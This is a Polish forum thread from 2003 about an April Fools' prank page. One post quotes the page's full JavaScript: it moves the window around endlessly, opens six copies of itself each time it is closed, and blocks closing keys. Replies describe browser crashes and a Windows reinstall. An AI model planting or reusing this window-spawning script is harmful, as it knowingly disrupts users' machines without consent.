Dijkstra Opublikowano 2 Kwietnia 2003 Zgłoś Opublikowano 2 Kwietnia 2003 Trochę po czasie, ale zawsze... KONIECZNIE OTWÓRZCIE TO W I-EXPLORERZE. http://www.extras2.republika.pl/ Można oc...pieć :x :x :x Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
[yarazz] Opublikowano 2 Kwietnia 2003 Zgłoś Opublikowano 2 Kwietnia 2003 Zajebista galeria :o Az mi wszystkie Explorery zamknelo :P <script language=Javascript>function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Prima Aprilis :)"); }function ctrlkey() { if (event.keyCode == 17) alert("Prima Aprilis :)"); }function delkey() { if (event.keyCode == 46) alert("Prima Aprilis :)"); } var xOff = 5; var yOff = 5; var xPos = 400; var yPos = -100; var flagRun = 1;function openWindow(url){ aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');}function procreate(){ openWindow('naga2.html'); openWindow('naga2.html'); openWindow('naga2.html'); openWindow('naga2.html'); openWindow('naga2.html'); openWindow('naga2.html'); }function newXlt(){ xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10; window.focus()}function newXrt(){ xOff = Math.ceil(7 * Math.random()) * 5 - 10; }function newYup(){ yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10; }function newYdn(){ yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ; }function fOff(){ flagrun = 0; }function playBall(){ xPos += xOff; yPos += yOff; if (xPos > screen.width-175){ newXlt(); } if (xPos < 0){ newXrt(); } if (yPos > screen.height-100){ newYup(); } if (yPos < 0){ newYdn(); } if (flagRun == 1){ window.moveTo(xPos,yPos); setTimeout('playBall()',1); } }</script></head><body bgColor=#ffffff onload="flagRun=1;playBall();return true;" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%"> <param name=movie value="youare.swf"> <param name=quality value=high> <embed src="youare.swf" tppabs="youare.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"> </embed> </object> Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
B3T0N Opublikowano 2 Kwietnia 2003 Zgłoś Opublikowano 2 Kwietnia 2003 <span style="color:red;">[ciach!]</span>A mac !!! teraz mi sie explorer zwalil i na full screenie mam tylko polowe okienka !!!! :x :x :x jak to naprawic , bo lece teraz na okienku :/ Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
M79 Opublikowano 2 Kwietnia 2003 Zgłoś Opublikowano 2 Kwietnia 2003 w2k sie nawet nie wzruszyl, pare razy zakon zadanie i po bolu :) Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Dijkstra Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 W 2k najlepsze jest to, że w menagerze zadań można hurtem zaznaczyć zadania do zakończenia...ale pad explorera i tak miałem :D Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
BLANTMEN Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 :evil: Jush raz dostałem bezpośredniego linka do tych skaczących okienek. Naprawde denerwujące :evil: Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
kamien Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 bueheheh mozilli w linuxie nie rusza... odpalam konsolke wale kill i po bolu, zadnych zwiechow :D Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
ArthJ Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 hehe, nie ma to jak alt+f4 :lol: Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Tomeq Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 q.r.w.a nie wlaczjecie tego :P :twisted: :P Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Feluke Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 Kurde zajebiste. Dobre do testowania kompa ale powiem jedno: OPERA RULEZZ :wink: :lol: Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Varrol Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 Trochę po czasie, ale zawsze... KONIECZNIE OTWÓRZCIE TO W I-EXPLORERZE. http://www.extras2.republika.pl/ Można oc...pieć :x :x :x Niech ja jeszcze raz zobacze post z linkiem do mnożących sie okienek, to ten co go napisał pożałuje, że żyje :evil: :evil: :evil: Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
k2 Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 na te w<span style="color:red;">[ciach!]</span>iajace okienka jest jesden zajebscie łatwy sposób, trzymac ALT+F4. Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Dijkstra Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 Trochę po czasie, ale zawsze... KONIECZNIE OTWÓRZCIE TO W I-EXPLORERZE. http://www.extras2.republika.pl/ Można oc...pieć :x :x :x Niech ja jeszcze raz zobacze post z linkiem do mnożących sie okienek, to ten co go napisał pożałuje, że żyje :evil: :evil: :evil: Pokornie błagam o wybaczenie. Prośbę swą motywuje brakiem podobnych wygroczeń w przeszłości... :? :? :? Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
kabull Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 Fajna strobka. Mi tam nic nie wyskakuje.... Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Gość Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 musialem reinstalowac windowsa XP Professional fak fak fak Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
-=Maq=- Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 Chyba jedyny mam najstabilniejszy sys. :) Ani 1 zwiechy itp. Yopeee Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
bruce Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 mi tam sie nic nie zrobilo ;p Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
bruce Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 mi tam sie nic nie zrobilo ;p Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Gość Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 mi tam sie nic nie zrobilo ;p bruce milo ze umiesciles w avatarze zdjecie panienki bardzo ladna istotka Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Gość Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 mi tam sie nic nie zrobilo ;p bruce milo ze umiesciles w avatarze zdjecie panienki bardzo ladna istotka Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Younior Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 bardzo fajne :P nie wiedzialem jak to zatrzymac to wylaczylem kompa :P Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
bruce Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 wal sie na ryj lolq twoj reflex mnie rozwalil :lol: Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Gość Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 wal sie na ryj lolq twoj reflex mnie rozwalil :lol: bruce twoja reakcja ojoj nie badz taki nerwowy ona jest naprawde sexy Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Raptor Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 a u mnie nic się nie pojawiło poza Dzis jest 1 kwietnia :| i dalej nic :) Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
bruce Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 a u mnie nic się nie pojawiło poza Dzis jest 1 kwietnia :| i dalej nic :) dopal drugi raz...... za 1 razem to samo za drugim juz troche bylo,z a trzecim.....wylaczylem wszystkie zadania ;] Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
bruce Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 wal sie na ryj lolq twoj reflex mnie rozwalil :lol: bruce twoja reakcja ojoj nie badz taki nerwowy ona jest naprawde sexy ignore Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Nygas Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 no i jakos mnie szlag nie trafil, a tak bardzo chcialem. wystarczyl tylko: pop-up stopper i menadzer zadan w w2k, autor sie nie pochwalil zabardzo. Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
[yarazz] Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 E to w koncu nie mial by jakis madafakin masta-hacka-nuka-killa tylko zart pryma aprylisowy :) Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Raptor Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 a u mnie nic się nie pojawiło poza Dzis jest 1 kwietnia :| i dalej nic :) dopal drugi raz...... za 1 razem to samo za drugim juz troche bylo,z a trzecim.....wylaczylem wszystkie zadania ;] Próbowałem kilka razy - może dlatego że mam MyIE i Ad Muncher zainstalowane :| Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
Jacek Opublikowano 3 Kwietnia 2003 Zgłoś Opublikowano 3 Kwietnia 2003 hm ja po przecztaniu wole nie probowac :) Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...